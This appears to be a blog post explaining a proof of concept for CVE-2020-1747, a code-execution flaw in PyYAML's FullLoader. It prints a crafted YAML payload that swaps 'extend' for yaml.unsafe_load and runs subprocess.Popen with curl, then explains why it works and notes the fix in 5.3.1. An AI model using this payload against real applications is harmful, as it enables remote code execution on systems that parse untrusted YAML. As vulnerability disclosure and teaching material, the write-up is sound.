CVE-2020-1747 PyYAML PoC
tl;dr ready to go script available at my Gist
Recently there was a vulnerability discovered in Python’s PyYAML library, which allowed for arbitraty code execution through YAML data deserialization. Original issue report and NVD’s vulnerability description have enough details about the case, so below I’ll just outline how to actually make it work.
Commits and tests linked in Github’s issue show, that construct_python_object_apply
function present in FullContructor
(being used by FullLoader
) is able to create a “state” property of an object being created. This property is possible to be set through the input passed to FullLoader
and therefore through user input from the file being loaded. The “state” property can have attributes, which also can be specified inside loaded YAML file. The constructor though does not check, whether attributes of this “state” passed by user are private class attributes, nor if the attribute conflicts with preexisting extend
method. This way those attributes and methods can be overriden.
An example below shows a crafted YAML file, which results in making an HTTP request with curl.
- !!python/object/new:yaml.MappingNode
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1/rce"]]'
state:
tag: !!str dummy
value: !!str dummy
extend: !!python/name:yaml.unsafe_load
First we define desired constructor, in this case PyYAML’s MappingNode
because the structure to be loaded is supposed to be Python’s mapping (other types to choose contain “scalar” and “sequence”). Next let’s take a look at the state
property - tag
and value
attributes are mandatory, so we’ll just pass whatever into them. Next, the extent
attribute is specified. See how extend
method is used in the code of FullContructor
:
def construct_python_object_apply(self, suffix, node, newobj=False):
# ...
# some code ommited here
#
instance = self.make_python_instance(suffix, node, args, kwds, newobj)
if state:
self.set_python_instance_state(instance, state)
if listitems:
instance.extend(listitems)
if dictitems:
for key in dictitems:
instance[key] = dictitems[key]
return instance
We see that extend
method belonging to some “instance” object is run. Since the “instance” has previously a “state” set based on our input, now the extend
method is overriden with yaml.unsafe_load
function. The extend
method receives a listitems
variable as input, which we also specify. In our case this is another simple PyYAML-structured data, which imports and runs subprocess.Popen
function. The data is casted to string, so later it can be easily pasted into unsafe_load
. Otherwise PyYAML would try to make a Python object out of it.
This way we replaced the extend
method with our yaml.unsafe_load
, which is known for it’s deserialization risks, and passed a YAML payload nested inside the actual YAML file.
Thanks to ret2libc for discovering and reporting this problem. The vulnerability was fixed in PyYAML 5.3.1 which was made available on PyPi shortly after issue publication, so thanks to the PyYAML team for that.